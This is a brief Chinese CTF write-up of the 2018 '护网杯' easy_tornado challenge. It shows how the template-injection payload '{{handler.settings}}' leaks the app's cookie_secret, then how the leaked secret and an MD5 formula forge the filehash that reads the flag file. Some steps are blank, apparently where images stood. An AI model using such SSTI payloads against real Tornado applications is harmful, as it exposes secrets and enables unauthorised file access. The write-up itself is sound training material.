[护网杯 2018]easy_tornado

前言

这道题需要对tornado框架有一些熟悉。因为不熟悉，后面就完全没有思路了，也就不会做了。这道题不止考某个知识点，更重要的是面对未知的东西，怎么去找资料和搜哪些关键词。

解题

1、看名字就觉得眼熟，额，是python框架。大概会涉及到SSTI。
2、flag在/fllllllllllllag，但是还需要filehash。而且cookie_secret也不知道是啥。


3、访问/fllllllllllllag时，出现这个页面。前面的都没有SSTI，试试这个就有了。
4、现在目标就是怎么利用msg这个参数来找到cookie_secret了。
看大佬wp：

cookie_secret在Application对象settings的属性中 ，访问它的话就需要知道它的属性名字
self.application.settings有一个别名是RequestHandler.settings
其中handler又是指向处理当前这个页面的RequestHandler对象
RequestHandler.settings指向self.application.settings
因此handler.settings指向RequestHandler.application.settings

5、/error?msg={{handler.settings}}
6、

payload：
/file?filename=/fllllllllllllag&filehash=ae495ccce0de1854f26d48060d15e6ec

md5（/fllllllllllllag）===  3bf9f6cf685a6dd8defadabfb41a03a1 
cookie_secret  ===  74070940-0627-49bd-876d-dc19e01f4b80    
md5(cookie_secret+md5(filename))  ===  74070940-0627-49bd-876d-dc19e01f4b803bf9f6cf685a6dd8defadabfb41a03a1                                                           

7、参考文章